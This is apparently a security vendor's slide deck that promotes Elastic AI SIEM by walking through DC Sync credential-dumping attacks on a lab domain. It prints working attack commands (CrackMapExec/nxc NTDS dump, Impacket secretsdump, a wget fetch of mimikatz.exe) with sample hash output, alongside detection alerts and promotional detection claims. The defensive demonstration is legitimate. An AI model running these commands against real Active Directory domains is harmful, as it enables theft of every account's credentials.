CarbonHelix - DC Sync Attack: Caught by Elastic AI SIEM

DC Sync Attack

CAUGHT BY ELASTIC AI SIEM

Presented by CarbonHelix

🔊 Voice narration active • Press Space or → to advance • Auto-advances after narration

What is a DC Sync Attack?

A DC Sync attack lets an attacker impersonate a Domain Controller to request password hashes from Active Directory — without ever running code on the DC itself.

Using the Directory Replication Service (DRSUAPI) protocol, the attacker simply asks for credential replication, mimicking normal DC-to-DC traffic. The result? Complete credential theft that looks like business as usual.

Compromise Account

→

Get Replication Rights

→

Call DsGetNCChanges

→

Dump NTLM Hashes

Why Most EDRs Can't Stop This

DC Sync exploits legitimate AD functionality — not malware. Blocking the replication protocol would break your entire domain.

LIVING OFF THE LAND

No malicious files, no binaries — just standard RPC calls using tools like Mimikatz, Impacket, or CrackMapExec

AUTHORIZED TRAFFIC

The compromised account has legitimate replication rights — the requests appear fully authorized

BLOCKING = OUTAGES

Hard-blocking DRSUAPI would break DC replication, authentication, and backups across the enterprise

Attack #1: CrackMapExec (Remote DC Sync)

The scariest attack — uses SMB for remote replication. Completely bypasses endpoint-level EDR.

kali@attacker

$ nxc smb 10.190.32.10 -u 'kevin.mitnick' --ntds

[*] Windows Server 2019 Build 17763 (domain:hackproof.local)

[+] hackproof.local\kevin.mitnick (Pwn3d!)

[*] Dumping the NTDS, this could take a while...

Administrator:500:aad3b435b51404eeaad3...

hackproof.local\juan:e19ccf75ee54e06b06a5...

hackproof.local\chen:b4b9b02e6f09a9bd760f...

[*] All domain hashes dumped successfully

Medium ⚠ Potential Credential Access via DC Sync

Risk Score: 47 User: kevin.mitnick Host: dc02 MITRE: T1003.006

Attack #2: Impacket SecretsDump (Remote)

Same goal, different tool. SecretsDump also dumps credentials from the SAM hive — and Elastic catches both techniques.

kali@attacker

$ impacket-secretsdump hackproof.local/kevin.mitnick@10.190.32.10

[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)

[*] Dumping LSA Secrets

[*] Using the DRSUAPI method to get NTDS.DIT secrets

Administrator:500:aad3b435b51404ee...

hackproof.local\kevin.mitnick:1103:aad3b435...

High ⚠ Potential Remote Credential Access via Registry

Risk Score: 73 User: kevin.mitnick Host: dc02 MITRE: T1003.002 / T1021

Attack #3: Mimikatz — Blocked Instantly

Mimikatz couldn't even run. Elastic quarantined the binary immediately upon download — the file simply disappeared.

PowerShell - dc02

PS> wget http://10.190.32.12:9090/mimikatz.exe -OutFile mimikatz.exe

PS> ls

(empty — file quarantined by Elastic)

High 🛡 Malware Prevention Alert — QUARANTINED

Risk Score: 73 Rule: Windows.Hacktool.Mimikatz File: mimikatz.exe Action: quarantined

Elastic Caught Every Attack

CrackMapExec

Remote DC Sync via SMB/DRSUAPI

DETECTED

SecretsDump.py

Remote DC Sync + SAM Hive dump

DETECTED

Mimikatz

Local DC Sync attempt

BLOCKED

Even attacks that bypass traditional EDRs are caught by Elastic's AI-driven behavioral analysis.

Elastic Attack Discovery

Elastic doesn't just alert — it tells the full story of the attack using AI-powered Attack Discovery.

ATTACK CHAIN CORRELATION

Groups related alerts into coherent attack chains — showing the full sequence of events

MITRE ATT&CK MAPPING

Automatically maps activity to MITRE tactics and techniques for standardized classification

AI-POWERED TRIAGE

Prioritizes real threats, filters noise, and automates investigation — so your analysts focus on what matters

FULL NARRATIVE

Tells who, what, when, where — identifying users, hosts, and the complete attack timeline

MITRE ATT&CK — Attack Chain Mapped

Elastic mapped the full attack to the MITRE ATT&CK framework, highlighting Privilege Escalation, Credential Access, and Lateral Movement.

Reconnaissance

Resource Dev

Initial Access

Execution

Persistence

Priv Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command & Control

Discovery Credential Dump and Privilege Escalation

Host: dc02 Users: kevin.mitnick Alerts: 2 Status: Open

Your SOC Has You Covered

3

Attack Tools Tested

3

Attacks Detected

0

Attacks Missed

CarbonHelix + Elastic AI SIEM
Protecting what matters. Even from the attacks that hide in plain sight.